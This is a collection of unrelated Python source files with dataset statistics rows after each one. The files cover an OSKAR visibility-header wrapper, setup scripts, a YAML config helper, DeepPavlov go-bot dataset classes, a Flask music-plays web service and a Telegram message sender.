# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""Interfaces to the OSKAR visibility header."""
from __future__ import absolute_import, division, print_function
from oskar.binary import Binary
try:
from . import _vis_header_lib
except ImportError:
_vis_header_lib = None
# pylint: disable=useless-object-inheritance
class VisHeader(object):
"""This class provides a Python interface to an OSKAR visibility header.
The :class:`oskar.VisHeader` class encapsulates the small amount of
metadata used to describe a visibility data set generated by OSKAR, and
it will be saved as part of any visibility data files written by the
:class:`oskar.Interferometer` class.
To load the header data from an OSKAR visibility binary file (note this
is not a CASA Measurement Set, although it can be converted into one),
use the :meth:`read() <oskar.VisHeader.read>` class method. This will
return a tuple containing both the header data and also a handle to the
binary file, which can be used to read subsequent :class:`oskar.VisBlock`
data structures from the same file.
The visibility data header for the current simulation can be returned
using the method :meth:`oskar.Interferometer.vis_header` if required.
Examples:
To load the header from a file ``example.vis`` and print some values
from it:
>>> (header, handle) = oskar.VisHeader.read('example.vis')
>>> print(header.num_blocks)
3
>>> print(header.num_times_total)
24
>>> print(header.num_channels_total)
3
>>> print(header.freq_start_hz)
100000000.0
>>> print(header.freq_inc_hz)
20000000.0
>>> print(header.phase_centre_ra_deg)
20.0
>>> print(header.phase_centre_dec_deg)
-29.999999999999996
"""
def __init__(self):
"""Constructs a handle to a visibility header."""
if _vis_header_lib is None:
raise RuntimeError("OSKAR library not found.")
self._capsule = None
def capsule_ensure(self):
"""Ensures the C capsule exists."""
if self._capsule is None:
raise RuntimeError(
"Call Interferometer.vis_header() for the visibility header.")
def capsule_get(self):
"""Returns the C capsule wrapped by the class."""
return self._capsule
def capsule_set(self, new_capsule):
"""Sets the C capsule wrapped by the class.
Args:
new_capsule (capsule): The new capsule to set.
"""
if _vis_header_lib.capsule_name(new_capsule) == 'oskar_VisHeader':
del self._capsule
self._capsule = new_capsule
else:
raise RuntimeError("Capsule is not of type oskar_VisHeader.")
def get_amp_type(self):
"""Returns the OSKAR data type of the visibility amplitude array."""
self.capsule_ensure()
return _vis_header_lib.amp_type(self._capsule)
def get_channel_bandwidth_hz(self):
"""Returns the width of each frequency channel, in Hz."""
self.capsule_ensure()
return _vis_header_lib.channel_bandwidth_hz(self._capsule)
def get_coord_precision(self):
"""Returns the OSKAR data type of the baseline coordinate arrays."""
self.capsule_ensure()
return _vis_header_lib.coord_precision(self._capsule)
def get_freq_inc_hz(self):
"""Returns the frequency channel increment, in Hz."""
self.capsule_ensure()
return _vis_header_lib.freq_inc_hz(self._capsule)
def get_freq_start_hz(self):
"""Returns the frequency of the first channel, in Hz."""
self.capsule_ensure()
return _vis_header_lib.freq_start_hz(self._capsule)
def get_max_channels_per_block(self):
"""Returns the maximum number of channels per visibility block."""
self.capsule_ensure()
return _vis_header_lib.max_channels_per_block(self._capsule)
def get_max_times_per_block(self):
"""Returns the maximum number of time samples per visibility block."""
self.capsule_ensure()
return _vis_header_lib.max_times_per_block(self._capsule)
def get_num_blocks(self):
"""Returns the expected number of visibility blocks for a run."""
self.capsule_ensure()
return _vis_header_lib.num_blocks(self._capsule)
def get_num_channels_total(self):
"""Returns the total number of frequency channels."""
self.capsule_ensure()
return _vis_header_lib.num_channels_total(self._capsule)
def get_num_stations(self):
"""Returns the number of stations."""
self.capsule_ensure()
return _vis_header_lib.num_stations(self._capsule)
def get_num_tags_per_block(self):
"""Returns the number of binary data tags per visibility block."""
self.capsule_ensure()
return _vis_header_lib.num_tags_per_block(self._capsule)
def get_num_times_total(self):
"""Returns the total number of time samples."""
self.capsule_ensure()
return _vis_header_lib.num_times_total(self._capsule)
def get_phase_centre_ra_deg(self):
"""Returns the phase centre Right Ascension, in degrees."""
self.capsule_ensure()
return _vis_header_lib.phase_centre_ra_deg(self._capsule)
def get_phase_centre_dec_deg(self):
"""Returns the phase centre Declination, in degrees."""
self.capsule_ensure()
return _vis_header_lib.phase_centre_dec_deg(self._capsule)
def get_time_start_mjd_utc(self):
"""Returns the start time, as MJD(UTC)."""
self.capsule_ensure()
return _vis_header_lib.time_start_mjd_utc(self._capsule)
def get_time_inc_sec(self):
"""Returns the time increment, in seconds."""
self.capsule_ensure()
return _vis_header_lib.time_inc_sec(self._capsule)
def get_time_average_sec(self):
"""Returns the time averaging period, in seconds."""
self.capsule_ensure()
return _vis_header_lib.time_average_sec(self._capsule)
# Properties
amp_type = property(get_amp_type)
capsule = property(capsule_get, capsule_set)
channel_bandwidth_hz = property(get_channel_bandwidth_hz)
coord_precision = property(get_coord_precision)
freq_inc_hz = property(get_freq_inc_hz)
freq_start_hz = property(get_freq_start_hz)
max_channels_per_block = property(get_max_channels_per_block)
max_times_per_block = property(get_max_times_per_block)
num_blocks = property(get_num_blocks)
num_channels_total = property(get_num_channels_total)
num_stations = property(get_num_stations)
num_tags_per_block = property(get_num_tags_per_block)
num_times_total = property(get_num_times_total)
phase_centre_ra_deg = property(get_phase_centre_ra_deg)
phase_centre_dec_deg = property(get_phase_centre_dec_deg)
time_start_mjd_utc = property(get_time_start_mjd_utc)
time_inc_sec = property(get_time_inc_sec)
time_average_sec = property(get_time_average_sec)
@classmethod
def read(cls, binary_file):
"""Reads a visibility header from an OSKAR binary file and returns it.
Args:
binary_file (str or oskar.Binary):
Path or handle to an OSKAR binary file.
Returns:
tuple: A two-element tuple containing the visibility header and
a handle to the OSKAR binary file, opened for reading.
"""
if _vis_header_lib is None:
raise RuntimeError("OSKAR library not found.")
hdr = VisHeader()
if isinstance(binary_file, Binary):
hdr.capsule = _vis_header_lib.read_header(binary_file.capsule)
return (hdr, binary_file)
fhan = Binary(binary_file, b'r')
hdr.capsule = _vis_header_lib.read_header(fhan.capsule)
return (hdr, fhan)
| 40.370213 | 79 | 0.702013 | 1,296 | 9,487 | 4.87963 | 0.23071 | 0.067837 | 0.045541 | 0.061828 | 0.354839 | 0.243359 | 0.221695 | 0.172676 | 0.120177 | 0.120177 | 0 | 0.007459 | 0.222726 | 9,487 | 234 | 80 | 40.542735 | 0.850149 | 0.464847 | 0 | 0.203884 | 0 | 0 | 0.034329 | 0.005722 | 0 | 0 | 0 | 0 | 0 | 1 | 0.213592 | false | 0 | 0.038835 | 0 | 0.631068 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb513c7cb4cfaba75c9bb580d5d1718b16468f02 | 463 | py | Python | etc/setup.py | c4s4/mysql_commando | def44e111e4e6438d7bc4e0f407c38af86e98880 | [
"Apache-2.0"
] | 2 | 2016-07-27T12:59:47.000Z | 2019-11-30T14:24:56.000Z | etc/setup.py | c4s4/mysql_commando | def44e111e4e6438d7bc4e0f407c38af86e98880 | [
"Apache-2.0"
] | null | null | null | etc/setup.py | c4s4/mysql_commando | def44e111e4e6438d7bc4e0f407c38af86e98880 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: UTF-8
from distutils.core import setup
setup(
name = 'mysql_commando',
version = 'VERSION',
author = 'Michel Casabianca',
author_email = 'casa@sweetohm.net',
packages = ['mysql_commando'],
url = 'http://pypi.python.org/pypi/mysql_commando/',
license = 'Apache Software License',
description = 'mysql_commando is an Oracle driver calling mysql',
long_description=open('README.rst').read(),
)
| 27.235294 | 69 | 0.680346 | 56 | 463 | 5.517857 | 0.75 | 0.168285 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002632 | 0.179266 | 463 | 16 | 70 | 28.9375 | 0.810526 | 0.077754 | 0 | 0 | 0 | 0 | 0.454118 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb58ba0f491c210148b7b90b9abe97b2078c4465 | 1,031 | py | Python | utils/yaml_helper.py | jiaqi-w/machine_learning | faf21f355d1d6d9de720ae77cbff3442db5cebc7 | [
"MIT"
] | 1 | 2018-10-29T16:55:07.000Z | 2018-10-29T16:55:07.000Z | utils/yaml_helper.py | jiaqi-w/machine_learning | faf21f355d1d6d9de720ae77cbff3442db5cebc7 | [
"MIT"
] | null | null | null | utils/yaml_helper.py | jiaqi-w/machine_learning | faf21f355d1d6d9de720ae77cbff3442db5cebc7 | [
"MIT"
] | null | null | null | import yaml
class Yaml_Helper():
def __init__(self, config_fname):
self.config = self.load_config(config_fname) or {}
@staticmethod
def load_config(config_fname):
"""
Loads the configuration file config_file given by command line or
config.DEFAULT_CONFIG when none is specified. the default values
are used for any configuration value that is not specified in config_file.
:param args:
:return: dictionary of config values
"""
with open(config_fname) as config_file:
conf = yaml.load(config_file)
return conf
def add_config(self, config_fname, should_override=False):
"""
Please note that this function will always override the key values.
:param config_fname:
:return:
"""
default = self.load_config(config_fname)
for key in default:
if key not in self.config or should_override and key in self.config:
self.config[key] = default[key]
| 34.366667 | 82 | 0.643065 | 132 | 1,031 | 4.848485 | 0.424242 | 0.120313 | 0.075 | 0.098438 | 0.078125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.29001 | 1,031 | 29 | 83 | 35.551724 | 0.874317 | 0.342386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb5a4a304b4822606cb8420489013996cae942be | 1,163 | py | Python | setup.py | simon-ball/nqo-mfs | 54bc84deb6ac0ab1dec724fee69c0d7b7c0ce3e9 | [
"MIT"
] | null | null | null | setup.py | simon-ball/nqo-mfs | 54bc84deb6ac0ab1dec724fee69c0d7b7c0ce3e9 | [
"MIT"
] | 1 | 2020-10-23T11:10:23.000Z | 2020-10-23T11:10:23.000Z | setup.py | simon-ball/nqo-mfs | 54bc84deb6ac0ab1dec724fee69c0d7b7c0ce3e9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open('README.md') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as f:
requirements = f.read().split()
setup(
author="Simon Ball",
author_email='s.w.ball@st-aidans.com',
classifiers=[
'Development Status :: 5 - release',
'Intended Audience :: Developers',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
description="Magnetic field visualisation code from the NQO group at SDU.",
install_requires=requirements,
long_description=readme,
include_package_data=True,
keywords='physics magnetism magnets',
name='mfs',
packages=find_packages(include=['mfs*']),
url='https://github.com/simon-ball/nqo-mfs',
version='1.1.1',
zip_safe=False,
) | 27.690476 | 79 | 0.647463 | 141 | 1,163 | 5.241135 | 0.595745 | 0.128552 | 0.169148 | 0.175913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.206363 | 1,163 | 42 | 80 | 27.690476 | 0.786566 | 0.032674 | 0 | 0 | 0 | 0 | 0.415179 | 0.019643 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.064516 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb5a673684a9f6feb55f8f7a0216913522c44b45 | 8,832 | py | Python | deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 4b60bf162df4294b8b0db3b72786cdd699c674fa | [
"Apache-2.0"
] | 5,893 | 2018-02-01T18:13:20.000Z | 2022-03-31T19:22:21.000Z | deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 4b60bf162df4294b8b0db3b72786cdd699c674fa | [
"Apache-2.0"
] | 749 | 2018-01-31T11:36:02.000Z | 2022-03-30T07:24:22.000Z | deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 4b60bf162df4294b8b0db3b72786cdd699c674fa | [
"Apache-2.0"
] | 1,155 | 2018-02-01T10:52:15.000Z | 2022-03-29T02:12:15.000Z | from typing import List
import numpy as np
# todo remove boilerplate duplications
# todo comments
# todo logging
# todo naming
from deeppavlov.models.go_bot.nlu.dto.nlu_response import NLUResponse
from deeppavlov.models.go_bot.policy.dto.digitized_policy_features import DigitizedPolicyFeatures
from deeppavlov.models.go_bot.tracker.dto.dst_knowledge import DSTKnowledge
from copy import deepcopy
class UtteranceFeatures:
"""
the DTO-like class storing the training features of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_mask: np.ndarray
attn_key: np.ndarray
tokens_embeddings_padded: np.ndarray
features: np.ndarray
def __init__(self,
nlu_response: NLUResponse,
tracker_knowledge: DSTKnowledge,
features: DigitizedPolicyFeatures):
self.action_mask = features.action_mask
self.attn_key = features.attn_key
tokens_vectorized = nlu_response.tokens_vectorized # todo proper oop
self.tokens_embeddings_padded = tokens_vectorized.tokens_embeddings_padded
self.features = features.concat_feats
class UtteranceTarget:
"""
the DTO-like class storing the training target of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_id: int
def __init__(self, action_id):
self.action_id = action_id
class UtteranceDataEntry:
"""
the DTO-like class storing both the training features and target
of a single utterance of a dialog (to feed the GO-bot policy model)
"""
features: UtteranceFeatures
target: UtteranceTarget
def __init__(self, features, target):
self.features = features
self.target = target
@staticmethod
def from_features_and_target(features: UtteranceFeatures, target: UtteranceTarget):
return UtteranceDataEntry(deepcopy(features), deepcopy(target))
@staticmethod
def from_features(features: UtteranceFeatures):
return UtteranceDataEntry(deepcopy(features), UtteranceTarget(None))
class DialogueFeatures:
"""
the DTO-like class storing both the training features
of a dialog (to feed the GO-bot policy model)
"""
action_masks: List[np.ndarray]
attn_keys: List[np.ndarray]
tokens_embeddings_paddeds: List[np.ndarray]
featuress: List[np.ndarray]
def __init__(self):
self.action_masks = []
self.attn_keys = []
self.tokens_embeddings_paddeds = []
self.featuress = []
def append(self, utterance_features: UtteranceFeatures):
self.action_masks.append(utterance_features.action_mask)
self.attn_keys.append(utterance_features.attn_key)
self.tokens_embeddings_paddeds.append(utterance_features.tokens_embeddings_padded)
self.featuress.append(utterance_features.features)
def __len__(self):
return len(self.featuress)
class DialogueTargets:
"""
the DTO-like class storing both the training targets
of a dialog (to feed the GO-bot policy model)
"""
action_ids: List[int]
def __init__(self):
self.action_ids = []
def append(self, utterance_target: UtteranceTarget):
self.action_ids.append(utterance_target.action_id)
def __len__(self):
return len(self.action_ids)
class DialogueDataEntry:
"""
the DTO-like class storing both the training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: DialogueFeatures
targets: DialogueTargets
def __init__(self):
self.features = DialogueFeatures()
self.targets = DialogueTargets()
def append(self, utterance_features: UtteranceDataEntry):
self.features.append(utterance_features.features)
self.targets.append(utterance_features.target)
def __len__(self):
return len(self.features)
class PaddedDialogueFeatures(DialogueFeatures):
"""
the DTO-like class storing both the **padded to some specified length** training features
of a dialog (to feed the GO-bot policy model)
"""
padded_dialogue_length_mask: List[int]
def __init__(self, dialogue_features: DialogueFeatures, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_features)
self.padded_dialogue_length_mask = [1] * len(dialogue_features) + [0] * padding_length
self.action_masks = dialogue_features.action_masks + \
[np.zeros_like(dialogue_features.action_masks[0])] * padding_length
self.attn_keys = dialogue_features.attn_keys + [np.zeros_like(dialogue_features.attn_keys[0])] * padding_length
self.tokens_embeddings_paddeds = dialogue_features.tokens_embeddings_paddeds + \
[np.zeros_like(
dialogue_features.tokens_embeddings_paddeds[0])] * padding_length
self.featuress = dialogue_features.featuress + [np.zeros_like(dialogue_features.featuress[0])] * padding_length
class PaddedDialogueTargets(DialogueTargets):
"""
the DTO-like class storing both the **padded to some specified length** training targets
of a dialog (to feed the GO-bot policy model)
"""
def __init__(self, dialogue_targets: DialogueTargets, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_targets)
self.action_ids = dialogue_targets.action_ids + [0] * padding_length
class PaddedDialogueDataEntry(DialogueDataEntry):
"""
the DTO-like class storing both the **padded to some specified length** training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: PaddedDialogueFeatures
targets: PaddedDialogueTargets
def __init__(self, dialogue_data_entry: DialogueDataEntry, sequence_length):
super().__init__()
self.features = PaddedDialogueFeatures(dialogue_data_entry.features, sequence_length)
self.targets = PaddedDialogueTargets(dialogue_data_entry.targets, sequence_length)
class BatchDialoguesFeatures:
"""
the DTO-like class storing both the training features
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_masks: List[List[np.ndarray]]
b_attn_keys: List[List[np.ndarray]]
b_tokens_embeddings_paddeds: List[List[np.ndarray]]
b_featuress: List[List[np.ndarray]]
b_padded_dialogue_length_mask: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_masks = []
self.b_attn_keys = []
self.b_tokens_embeddings_paddeds = []
self.b_featuress = []
self.b_padded_dialogue_length_mask = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_features: PaddedDialogueFeatures):
self.b_action_masks.append(padded_dialogue_features.action_masks)
self.b_attn_keys.append(padded_dialogue_features.attn_keys)
self.b_tokens_embeddings_paddeds.append(padded_dialogue_features.tokens_embeddings_paddeds)
self.b_featuress.append(padded_dialogue_features.featuress)
self.b_padded_dialogue_length_mask.append(padded_dialogue_features.padded_dialogue_length_mask)
def __len__(self):
return len(self.b_featuress)
class BatchDialoguesTargets:
"""
the DTO-like class storing both the training targets
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_ids: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_ids = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_targets: PaddedDialogueTargets):
self.b_action_ids.append(padded_dialogue_targets.action_ids)
def __len__(self):
return len(self.b_action_ids)
class BatchDialoguesDataset:
"""
the DTO-like class storing both the training features and target
of a batch of dialogues. (to feed the GO-bot policy model)
Handles the dialogues padding.
"""
features: BatchDialoguesFeatures
targets: BatchDialoguesTargets
def __init__(self, max_dialogue_length):
self.features = BatchDialoguesFeatures(max_dialogue_length)
self.targets = BatchDialoguesTargets(max_dialogue_length)
self.max_dialogue_length = max_dialogue_length
def append(self, dialogue_features: DialogueDataEntry):
padded_dialogue_features = PaddedDialogueDataEntry(dialogue_features, self.max_dialogue_length)
self.features.append(padded_dialogue_features.features)
self.targets.append(padded_dialogue_features.targets)
def __len__(self):
return len(self.features)
| 34.100386 | 119 | 0.718637 | 1,048 | 8,832 | 5.757634 | 0.101145 | 0.058336 | 0.039443 | 0.029831 | 0.482764 | 0.361949 | 0.334935 | 0.275936 | 0.260027 | 0.260027 | 0 | 0.000997 | 0.205389 | 8,832 | 258 | 120 | 34.232558 | 0.858792 | 0.177423 | 0 | 0.169014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007752 | 0 | 1 | 0.183099 | false | 0 | 0.042254 | 0.056338 | 0.556338 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb5c048667a0292288c7bd98af21da085db5a478 | 8,880 | py | Python | app/ws.py | javi-cortes/music_ws | 7ca60e481f16d71ee6d3ff61e112ba12e9c7db8f | [
"MIT"
] | null | null | null | app/ws.py | javi-cortes/music_ws | 7ca60e481f16d71ee6d3ff61e112ba12e9c7db8f | [
"MIT"
] | null | null | null | app/ws.py | javi-cortes/music_ws | 7ca60e481f16d71ee6d3ff61e112ba12e9c7db8f | [
"MIT"
] | null | null | null | import json
from datetime import timedelta
import dateutil.parser
from flask import Blueprint, request
from app.models.main import Channel, Performer, Song, Play
# Response codes
CODE_KO = 1
CODE_OK = 0
music_ws = Blueprint('music_ws', __name__)
@music_ws.route('/', methods=['GET'])
def index():
return 'Hello this is dog "/"'
def build_response(result, code, errors=None):
r = {'result': result, 'code': code}
if errors:
r['errors'] = errors
return json.dumps(r)
# INGESTION
@music_ws.route('/add_channel', methods=['POST'])
def add_channel():
channel = request.values.get('name', '')
r = {'result': "", 'code': CODE_KO}
if channel:
Channel.objects(name=channel).update_one(upsert=True, name=channel)
r['result'] = "Channel '%s' added/updated" % channel
r['code'] = CODE_OK
if not channel:
r['errors'] = ['Channel name not provided']
return build_response(**r)
@music_ws.route('/add_performer', methods=['POST'])
def add_performer():
performer = request.values.get('name', '')
r = {'result': "", 'code': CODE_KO}
if performer:
Performer.objects(name=performer).update_one(upsert=True, name=performer)
r['result'] = "Performer '%s' added/updated" % performer
r['code'] = CODE_OK
if not performer:
r['errors'] = ['Performer name not provided']
return build_response(**r)
@music_ws.route('/add_song', methods=['POST'])
def add_song():
title = request.values.get('title', '')
performer = request.values.get('performer', '')
r = {'result': "", 'code': CODE_KO}
if title and performer:
Song.objects(title=title, performer=performer).update_one(upsert=True, title=title, performer=performer)
r['result'] = "Song '%s' by '%s' added/updated" % (title, performer)
r['code'] = CODE_OK
if not (title and performer):
r['errors'] = ['Title or performer not provided']
return build_response(**r)
@music_ws.route('/add_play', methods=['POST'])
def add_play():
title = request.values.get('title', '')
performer = request.values.get('performer', 'unknown-performer')
start = request.values.get('start', '')
end = request.values.get('end', '')
channel = request.values.get('channel', '')
r = {'result': "", 'code': CODE_KO, 'errors': []}
necessary_data = all([title, performer, start, end, channel])
if necessary_data:
dates_parsed = _parse_date_helper([start, end])
if dates_parsed:
parsed_start, parsed_end = dates_parsed
play_data = dict(title=title, performer=performer, start=parsed_start, end=parsed_end, channel=channel)
Play.objects(**play_data).update_one(upsert=True, **play_data)
r['result'] = "Play '%s' added/updated" % (", ".join(["%s: %s" % (k, v) for k, v in play_data.items()]))
r['code'] = CODE_OK
else:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
if not necessary_data:
r['errors'].append('Title, Performer, Start, End or Channel not provided')
return build_response(**r)
# REQUEST
@music_ws.route('/get_song_plays', methods=['GET'])
def get_song_plays():
title = request.values.get('title', '')
performer = request.values.get('performer', '')
start = request.values.get('start', '')
end = request.values.get('end', '')
r = {'result': [], 'code': CODE_KO, 'errors': []}
necessary_data = all([title, performer, start, end])
if necessary_data:
dates_parsed = _parse_date_helper([start, end])
if dates_parsed:
parsed_start, parsed_end = dates_parsed
plays = Play.objects(start__gte=parsed_start, end__lte=parsed_end, title=title, performer=performer)
r['result'] = prepare_song_plays(plays)
r['code'] = CODE_OK
else:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
if not necessary_data:
r['errors'].append('Title, Performer, Start or End not provided')
return build_response(**r)
@music_ws.route('/get_channel_plays', methods=['GET'])
def get_channel_plays():
channel = request.values.get('channel', '')
start = request.values.get('start', '')
end = request.values.get('end', '')
r = {'result': [], 'code': CODE_KO, 'errors': []}
necessary_data = all([channel, start, end])
if necessary_data:
dates_parsed = _parse_date_helper([start, end])
if dates_parsed:
parsed_start, parsed_end = dates_parsed
plays = Play.objects(start__gte=parsed_start, end__lte=parsed_end, channel=channel)
r['result'] = prepare_channel_plays(plays)
r['code'] = CODE_OK
else:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
if not necessary_data:
r['errors'].append('Title, Performer, Start or End not provided')
return build_response(**r)
@music_ws.route('/get_top', methods=['GET'])
def get_top():
channels = json.loads(request.values.get('channels', '{}'))
start = request.values.get('start', '')
r = {'result': [], 'code': CODE_KO, 'errors': []}
try:
limit = int(request.values.get('limit', 0))
except:
r['errors'].append("Invalid limit, provide a valid integer")
return build_response(**r)
start_parsed = _parse_date_helper(start)
if not start_parsed:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
return build_response(**r)
# from a given date substract its position in the week, so we get start and end of the week of the provided date.
start_week = start_parsed[0] - timedelta(days=start_parsed[0].weekday())
end_week = start_week + timedelta(days=6)
# calculate current week
top_plays = get_top_aggregate(channels, start_week, end_week, limit)
# calculate past week
# TODO : this query should be cached or pre-calculated in another structure.
lastweek_start = start_week - timedelta(days=7)
lastweek_end = lastweek_start + timedelta(days=6)
top_plays_lastweek = get_top_aggregate(channels, lastweek_start, lastweek_end, limit)
r['result'] = prepare_top_plays(top_plays, top_plays_lastweek)
r['code'] = CODE_OK
return build_response(**r)
# Helpers
def _parse_date_helper(dates):
"""
Date helper to parse dates in UTC ISO 8601 format.
Accepts single date or list.
"""
dates = [dates] if type(dates) is not list else dates
try:
return map(lambda d: dateutil.parser.parse(d), dates)
except Exception:
return []
# TODO : prepare_song_plays and prepare_channel_plays could be more generic.
def prepare_song_plays(plays):
_plays = []
for plays in plays:
_plays.append({
'channel': plays.channel,
'start': plays.start.isoformat(),
'end': plays.end.isoformat()
})
return _plays
def prepare_channel_plays(plays):
_plays = []
for plays in plays:
_plays.append({
'performer': plays.performer,
'title': plays.title,
'start': plays.start.isoformat(),
'end': plays.end.isoformat()
})
return _plays
def prepare_top_plays(plays, lastweek_plays):
"""
Join current plays with last week.
TODO : This is a temporary process, all top plays should be summarized and stored in the DB.
"""
for rank, p in enumerate(plays):
p['previous_plays'] = 0 # default value
p['previous_rank'] = None # default value
p['rank'] = rank
for rank_lastweek, lp in enumerate(lastweek_plays):
if p['title'] == lp['title'] and p['performer'] == lp['performer']:
# that guy was in the last week, push up his data to plays list.
p['previous_plays'] = lp['plays']
p['previous_rank'] = rank_lastweek
return plays
def get_top_aggregate(channels, start_week, end_week, limit):
plays = Play._get_collection().aggregate([
{
"$match": {
"channel": {"$in": channels},
"start": {"$gte": start_week},
"end": {"$lte": end_week}
}
},
{
"$group": {
"_id": {
"performer": "$performer",
"title": "$title"
},
"plays": {"$sum": 1}
}
},
{
"$project": {
"_id": 0,
"performer": "$_id.performer",
"title": "$_id.title",
"plays": 1
}
},
{"$sort": {"plays": -1}},
{"$limit": limit}
])
return list(plays) | 31.714286 | 117 | 0.601689 | 1,091 | 8,880 | 4.726856 | 0.156737 | 0.047896 | 0.058949 | 0.034904 | 0.470235 | 0.420981 | 0.390149 | 0.380454 | 0.380454 | 0.347489 | 0 | 0.004981 | 0.253941 | 8,880 | 280 | 118 | 31.714286 | 0.773434 | 0.072635 | 0 | 0.38191 | 0 | 0 | 0.170747 | 0 | 0 | 0 | 0 | 0.010714 | 0 | 1 | 0.070352 | false | 0 | 0.025126 | 0.005025 | 0.180905 | 0.01005 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
246f42b9ab1dca2ee51900cb7e5757551282b861 | 635 | py | Python | src/senders/telegram_sender.py | maticardenas/football_api_notif | 81f9e265d4effb7545e3d9ad80ee1109cd9b8edf | [
"MIT"
] | null | null | null | src/senders/telegram_sender.py | maticardenas/football_api_notif | 81f9e265d4effb7545e3d9ad80ee1109cd9b8edf | [
"MIT"
] | null | null | null | src/senders/telegram_sender.py | maticardenas/football_api_notif | 81f9e265d4effb7545e3d9ad80ee1109cd9b8edf | [
"MIT"
] | null | null | null | from config.notif_config import NotifConfig
from src.api.telegram_client import TelegramClient
def send_telegram_message(
chat_id: str, message: str = "", photo: str = "", video: str = ""
) -> None:
telegram_client = TelegramClient(NotifConfig.TELEGRAM_TOKEN)
if photo:
response = telegram_client.send_photo(chat_id, photo_url=photo, text=message)
elif video:
response = telegram_client.send_video(chat_id, video_url=video, text=message)
else:
response = telegram_client.send_message(chat_id, message)
print(f"TELEGRAM MESSAGE SENT RESPONSE: {response.status_code}\n{response.text}")
